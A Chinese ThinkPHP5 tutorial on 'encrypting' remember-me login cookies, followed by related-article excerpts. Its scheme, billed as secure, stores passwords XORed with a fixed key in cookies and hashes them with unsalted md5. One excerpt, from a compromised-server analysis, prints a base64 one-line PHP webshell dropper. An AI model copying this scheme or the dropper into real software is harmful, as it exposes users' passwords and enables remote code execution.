tp5框架使用cookie加密算法实现登录功能示例
本文实例讲述了tp5框架使用cookie加密算法实现登录功能。分享给大家供大家参考,具体如下:
首先,我们为什么要对cookie加密?
之所以要对cookie加密是以为cookie是保存在客户端的,稍微懂一点技术的人都能找到cookie的保存位置,如果我们保存cookie的时候没有加密,而是明文保存的话也就是说我们的用户名和密码就完全暴露了,这是一个非常大的安全隐患,所以必须加密cookie。
其次,我们不管要对cookie加密,还要考虑到当我们使用的时候要对加密后的cookie进行解密处理,得到正确的用户名和密码后才能做自动登录一类的功能,下面看看我们的加密方案:
1:在配置文件config中添加
'encryption_key' =>'d441d33a65d31dbf0a8016a85c71a5b3',
2:在common文件中添加
//type 0:加密 1:解密
function encryption($value,$type=0){
$key=config('encryption_key');
if($type == 0){//加密
return str_replace('=', '', base64_encode($value ^ $key));
}else{
$value=base64_decode($value);
return $value ^ $key;
}
}
3:在模型中加密代码
public function login($data,$type=0){
$userData=array();
$userData['username']=trim($data['username']);
$userData['password']=md5($data['password']);
//验证用户名或邮箱或手机号是否存在
$users=db('user')->where(array('username'=>$userData['username']))->whereOr(array('email'=>$userData['username']))->whereOr(array('mobile_phone'=>$userData['username']))->find();
// dump($users); die;
if($users){
if($users['password'] == $userData['password']){
session('uid',$users['id']);
session('username',$users['username']);
//写入会员等级及折扣率
$points=$users['points'];
$memberLevel=db('member_level')->where('bom_point','<=',$points)->where('top_point','>=',$points)->find();
session('level_id',$memberLevel['id']);//等级id
session('level_rate',$memberLevel['rate']);//等级折扣率
//写入cookie
if(isset($data['remember'])){
$aMonth=30*24*60*60;
$username=encryption($users['username'],0);
$password=encryption($data['password'],0);
cookie('username', $username, $aMonth, '/');
cookie('password', $password, $aMonth, '/');
}
$arr=[
'error'=>0,
'message'=>"",
];
if($type == 1){
return $arr;
}else{
return json($arr);
}
}else{
$arr=[
'error'=>1,
'message'=>"<i class='iconfont icon-minus-sign'></i>用户名或者密码错误",
'url'=>'',
];
if($type == 1){
return $arr;
}else{
return json($arr);
}
}
}else{
$arr=[
'error'=>1,
'message'=>"<i class='iconfont icon-minus-sign'></i>用户名或者密码错误",
'url'=>'',
];
if($type == 1){
return $arr;
}else{
return json($arr);
}
}
}
4:在控制器中解密代码
public function checkLogin(){
$uid=session('uid');
if($uid){
$arr['error']=0;
$arr['uid']=$uid;
$arr['username']=session('username');
return json($arr);
}else{
if(cookie('username') && cookie('password')){
$data['username']=encryption(cookie('username'),1);
$data['password']=encryption(cookie('password'),1);
$loginRes=model('user')->login($data,1);
if($loginRes['error'] == 0){
$arr['error']=0;
$arr['uid']=$uid;
$arr['username']=session('username');
return json($arr);
}
}
$arr=array();
$arr['error']=1;
return json($arr);
}
}
更多关于thinkPHP相关内容感兴趣的读者可查看本站专题:《ThinkPHP入门教程》、《thinkPHP模板操作技巧总结》、《ThinkPHP常用方法总结》、《codeigniter入门教程》、《CI(CodeIgniter)框架进阶教程》、《Zend FrameWork框架入门教程》及《PHP模板技术总结》。
希望本文所述对大家基于ThinkPHP框架的PHP程序设计有所帮助。
相关推荐
-
thinkphp微信开发(消息加密解密)
使用thinkphp官方的WeChat包,使用不同模式可以成功,但是安全模式就是不行,现将分析解决结果做下记录. 分析问题: 解密微信服务器消息老是不成功,下载下微信公众平台官方给出的解密文件和WechatCrypt.class.php进行比对发现也没有问题.用file_put_contents函数保存下解密后的文件进行分析.发现官方包解密的xml不是标准的xml格式,所以simplexml_load_string函数无法处理. /** * 对密文进行解密 * @param string $en
-
thinkphp3.x中cookie方法的用法分析
本文实例分析了thinkphp3.x中cookie方法的用法.分享给大家供大家参考,具体如下: 一.cookie函数也是一个多元化操作函数,完成cookie的设置.获取和删除操作. Cookie 用于Cookie 设置.获取.删除操作: 用法: cookie($name, $value='', $option=null) 参数: name(必须):要操作的cookie变量 value(可选):要设置的cookie值 option(可选):传入的cookie设置参数,默认为空 返回值 见详(根据具
-
thinkphp微信开之安全模式消息加密解密不成功的解决办法
ThinkPHP框架是国内比较流行的PHP框架之一,虽然跟国外的那些框架没法比,但优点在于,恩,中文手册很全面,在此不多说了. 使用thinkphp官方的WeChat包,使用不同模式可以成功,但是安全模式就是不行,现将分析解决结果做下记录. 分析问题: 解密微信服务器消息老是不成功,下载下微信公众平台官方给出的解密文件和WechatCrypt.class.php进行比对发现也没有问题.用file_put_contents函数保存下解密后的文件进行分析.发现官方包解密的xml不是标准的xml格式
-
PHP隐形一句话后门,和ThinkPHP框架加密码程序(base64_decode)
今天一个客户的服务器频繁被写入: mm.php 内容为: 复制代码 代码如下: <?eval($_POST[c]);?> 最后查到某文件内的第一行为以下代码: 复制代码 代码如下: fputs(fopen(base64_decode("bW0ucGhw"),"w"),base64_decode("PD9ldmFsKCRfUE9TVFtjXSk7Pz4=")); base64_decode("bW0ucGhw") /
-
thinkphp5框架结合mysql实现微信登录和自定义分享链接与图文功能示例
本文实例讲述了thinkphp5框架结合mysql实现微信登录和自定义分享链接与图文功能.分享给大家供大家参考,具体如下: php代码 function curlHtml($url){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CU
-
thinkPHP中U方法加密传递参数功能示例
本文实例讲述了thinkPHP中U方法加密传递参数功能.分享给大家供大家参考,具体如下: thinkPHP中的U方法用于对URL地址进行组装.可自动根据当前的URL模式和设置生成对应的URL地址.基本使用可参考 //www.jb51.net/article/51057.htm 具体代码如下: <?php /** * 简单对称加密算法之加密 * @param String $string 需要加密的字串 * @param String $skey 加密EKY */ function encode(
-
thinkphp中session和cookie无效的解决方法
本文实例讲述了thinkphp中session和cookie无效的解决方法.分享给大家供大家参考.具体分析如下: 问题描述: 在本地调试时session和cookie是用没有问题的,我是用session保存当前登录账户的信息,上传服务器之后,发现跳转之后session不复存在,为什么呢?在当前页面输出session是存在的. 遇到这个问题三天了,因为是自学没有老师可以请教,身边也没有几个是弄PHP的,所以真的是很悲剧,于是乎百度,而百度上很多人都是屁话连天,没有什么可以解决问题的,经过三天的修改
-
ThinkPHP实现的rsa非对称加密类示例
本文实例讲述了ThinkPHP实现的rsa非对称加密类.分享给大家供大家参考,具体如下: 公钥加密后的字符串是一直变化的,但是用私钥解密后的内容仍然是相同的,这是为了加密数据使用的. 私钥加密的字符串是不会变化的,即使暴露在外网上别人截取时如果没有公钥也是看不出来内容的,仅允许给予公钥的第三方来解密并看到内容,实际作用相当于签名功能,如果能拿到未加密的内容,说明一定是信任方的数据,因为有他的签名啊. 其实这种非对称加密技术可以用于单点登录中去,安全级别高,能解密获取到内容应该就是信任方的数据.
-
ThinkPHP的cookie和session冲突造成Cookie不能使用的解决方法
近期做一个网站的投票时,遇到ThinkPHP中的cookie和session冲突导致Cookie不能使用的情况. 该网站采用的是ThinkPHP框架制作,有一页面上面展示很多图片,要求每个图片下面有对应的投票,通过限制ip地址来,限制游客在一定时间范围内,能对多个图片投票,但是每个图片只能投票一次,开始使用ip存储在数据库解决,后来改进为使用session存储,ip在服务文件里,不过要把生成的sessionid存储在本地的cookie中,按照ThinkPHP手册说明操作session一切顺利,但
-
thinkPHP5项目中实现QQ第三方登录功能
本文实例讲述了thinkPHP5项目中实现QQ第三方登录功能.分享给大家供大家参考,具体如下: 最近用thinkPHP 5框架做了一个婚纱店的项目,在开发过程中需要用到第三方登录,腾讯官方给的案例是几个文件相互包含实现的,放到tp5里面很悲催的发现在控制器中不能通过include或者require完成预期功能,想要用腾讯官方封的类就必须对其进行修改,修改如下: 1. 找到官方SDK里面的核心文件 框架外使用的时候是include 'qqConnectAPI.php',打开这个文件可以看到它是包含